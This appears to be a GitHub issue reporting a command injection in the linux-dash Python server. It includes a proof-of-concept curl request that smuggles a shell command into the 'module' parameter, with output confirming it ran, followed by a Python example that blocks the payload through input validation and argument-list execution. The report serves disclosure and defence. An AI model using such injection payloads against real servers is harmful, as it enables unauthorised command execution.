tariqbuilds / linux-dash

A beautiful web dashboard for Linux

Home Page: https://afaqurk.github.io/linux-dash/

injection vulnerabilities

jefimm opened this issue · comments

How to exploit the Python server:

python index.py --port 8080

Trigger the command injection:

curl -v 'http://localhost:8080/server/?module=$(touch${IFS}/tmp/uhoh)'
*   Trying 127.0.0.1:8080...
* TCP_NODELAY set
* Connected to localhost (127.0.0.1) port 8080 (#0)
> GET /server/?module=$(touch$IFS/tmp/uhoh) HTTP/1.1
> Host: localhost:8080
> User-Agent: curl/7.68.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Server: BaseHTTP/0.3 Python/2.7.18
< Date: Tue, 20 Apr 2021 15:09:56 GMT
< Content-type: text/html
< 
{\"success\":false,\"status\":\"Invalid module\"}

Verify:

ls -ltr /tmp/uhoh
-rw-rw-r-- 1 thomas thomas 0 Apr 20 16:09 /tmp/uhoh
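
One way to make the `module` parameter inert on the server side, added here as an example and not code from linux-dash or from the issue author. It is written for Python 3 and assumes the server hands `module` to an external script; the name pattern and the `HANDLER` stand-in are hypothetical.

```python
import os
import re
import subprocess
import sys
import tempfile

# Assumption: module names are short lowercase identifiers such as "cpu_info".
MODULE_RE = re.compile(r"\A[a-z0-9_]{1,64}\Z")

# Hypothetical stand-in for the server-side script: writes back its first argument.
HANDLER = [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])"]


def run_argv(module):
    """Run the handler with module as one argv element; no shell parses it."""
    proc = subprocess.run(HANDLER + [module], stdout=subprocess.PIPE,
                          stderr=subprocess.DEVNULL, timeout=10, check=True)
    return proc.stdout.decode()


def run_module(module):
    """Validate the request parameter first, then run the handler."""
    if not MODULE_RE.match(module):
        raise ValueError("Invalid module")
    return run_argv(module)


def demo():
    """Return (rejected, echoed_literally, marker_created) for the issue's payload."""
    marker = os.path.join(tempfile.mkdtemp(), "uhoh")
    # Constructed from the request in the issue, pointed at a temp directory.
    payload = "$(touch${IFS}%s)" % marker
    try:
        run_module(payload)
        rejected = False
    except ValueError:
        rejected = True
    # Even with validation skipped, argv passing leaves the payload as plain text.
    echoed = run_argv(payload) == payload
    return rejected, echoed, os.path.exists(marker)


if __name__ == "__main__":
    print(demo())
```

The two controls are independent: the pattern check rejects the request before any process starts, and passing an argument list instead of a command string means `$( )` is never interpreted.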